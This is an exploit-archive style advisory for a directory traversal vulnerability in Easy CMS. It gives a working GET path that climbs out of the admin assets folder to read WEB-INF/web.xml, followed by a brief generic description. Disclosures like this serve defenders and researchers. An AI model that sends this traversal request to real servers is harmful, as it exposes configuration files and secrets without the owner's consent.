Easy CMS Directory traversal Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Easy CMS Directory traversal Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title : Easy CMS Directory traversal Vulnerability |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor : https://github.com/moocss/EasyCMS |[+] |[+] Download Link : https://codeload.github.com/moocss/EasyCMS/zip/master |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 1 /1 / 2017 |=============================================================| |[+] Vuln Path : http://127.0.0.1/EasyCMS-master/WebRoot/admin/assets/images/../../../WEB-INF/web.xml? |[+] Method :GET |=============================================================| |[+] Vulnerability description |==============================| |[+]This script is possibly vulnerable to directory traversal attacks. |[+]Directory Traversal is a vulnerability which allows attackers to access |[+]restricted directories and execute commands outside of the web server's |[+]root directory. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| </BODY></HTML>